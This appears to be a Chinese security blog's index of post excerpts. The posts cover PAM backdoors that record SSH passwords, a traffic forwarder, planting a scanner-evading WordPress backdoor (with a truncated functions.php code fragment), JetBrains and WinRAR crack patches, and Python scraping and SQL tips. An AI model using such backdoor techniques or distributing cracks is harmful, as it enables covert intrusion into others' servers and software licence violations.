NEW

PAM后门小研究

PAM后门小研究
在渗透某目标的过程中,发现目标服务器已被植入后门,具体表现是在/tmp/.p目录下,存在以日期为后缀的pass.txt文件,内容为记录 SSH 登录 IP、用户名和密码。 当时想简单做个应急响应,无奈没找到后门文件所在,再加上自己是公钥方式登录 SSH,不在乎被记录密码,就放在一边。后来自己遇到了瓶颈,想要获取目标的 SSH 密码进行突破,就去研究了下记录 SSH 密码的工具,也...

Realm 多端口UDP + TCP流量转发工具

Realm 多端口UDP + TCP流量转发工具
背景 流量转发,顾名思义是能够转发TCP或UDP流量到指定远程主机的工具。它主要用于内网的代理,及一切需要转发流量的场景。目前,已经有很多类似的工具出现了,常见的有socat,brook等。但是,这些工具都局限于固定的ip,即只能在启动时就指定好要转发的ip地址。brook可以解析域名,但却不能动态解析。网络上虽然流行有一键脚本,能够完成动态解析,但复杂的脚本本身也是一...

牵绊

牵绊
好久好久好久没有更新个人博客了,没有忘,本来一个月一篇的,为什么不更新?懒???可能、也许。。。 那我知道看这个无聊文章的你会问,为什么今天想着更新了呢?撤个题外话,做一个勾引,中国人太注重节日的概念,中国人太注重亲情,特别是节假日。 今天是我的生日。 喝了3瓶啤酒,有一点晕晕呼呼的,其实喝酒就是要这种感觉的。 回归正题吧,牵绊~~~2020年应该是我最累...

wordpress 如何留D盾免杀后门

wordpress 如何留D盾免杀后门
其实主要是通过https://www.52pojie.cn/thread-1084019-1-1.html 这篇文章给予的启发。 只需要在模板文件functions.php中加入后门代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 add_action('wp_head', 'wp_backdoor'); function wp_backdoor() { if ( md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b' &...

Jetbrains(pycharm phpstorm等)全家桶 激活补丁v3.2.3

Jetbrains(pycharm phpstorm等)全家桶 激活补丁v3.2.3
相关 PyCharm 针对Python语言打造的轻量级IDE,通过Django框架和Google App Engine来支持web开发。 IntelliJ IDEA 功能强大,完美交互的JAVA语言集成开发平台,满足企业级开发需求,支持移动端和网页端开发。 PhpStorm 专为Web和PHP开发者打造的专业集成开发环境。 WebStorm 适用于专业JavaScript和前端Web开发人员的集成开发环境。 DataGrip 适用于数据库与SQL开发人员的...

WinRAR6.00 官方中文商业版 + 授权文件

WinRAR6.00 官方中文商业版 + 授权文件
国内版的尝试很多次用中文,可是授权的东西是不生效的,还是有广告弹出!有点东西! WinRAR本身是个英文商业软件,解压软件用来用去还是WinRAR用的舒服,其他的用不大习惯。 虽然有7-zip开源软件,但用不习惯,还是换回了WinRAR。 关于WinRAR的下载,要说明一下。 国内的WinRAR不是官网,是一个代理商,所以免费的中文版的会有广告弹出。下面的中文是无广告版本。需要注册...

idea激活教程之最新破解教程(亲测有效)

idea激活教程之最新破解教程(亲测有效)
申明:本教程 IntelliJ IDEA 破解补丁、激活码均收集于网络,请勿商用,仅供个人学习使用,如有侵权,请联系作者删除。 防止走失,请使用快捷键 Ctrl+D 收藏本站~ 注意:请卸载掉之前的破解,才能安装此破解工具,否则会出现idea不能打开的情况~ 最近,找到了一种新的idea激活方法,支持Jetbrains全家桶,比如 idea、pychram、WebStorm等等,没得zhile那么复杂,各种参数,...

动态爬虫神器 – requests_html Chromium渲染

动态爬虫神器 – requests_html Chromium渲染
今天凑时间研究了下requests_html模块,它是requests模块作者开发的另一款爬虫神器。此模块主要结合了xpath网页源码获取功能,以及pyppeteer网页动态渲染功能。后者方便我们获取js动态渲染的源代码,而前者方便从源代码中获取想要的内容。 模块下载安装 pip install requests-html 注意目前只支持python3.6版本 模块基础用法 from requests_html import HTMLSession url ...

python SQL WHERE IN参数化编译写法

python SQL WHERE IN参数化编译写法
最近在一次使用sql中的where in语句时,造成了一些非预期的查询结果。尤其是在代码中去编写并执行sql语句时,会出现一些意外情况。再查阅了一些资料以及手动测试后,发现是自己sql语句写法存在问题,在此记录。 例子 业务需求,需要通过SQL语句从asset资产表中查询域名字段在(“thief.one”,”nmask.cn”,”sec.thief.one”)范围内的数据库记录,SQL语句该怎么写呢? 拼接法(错误...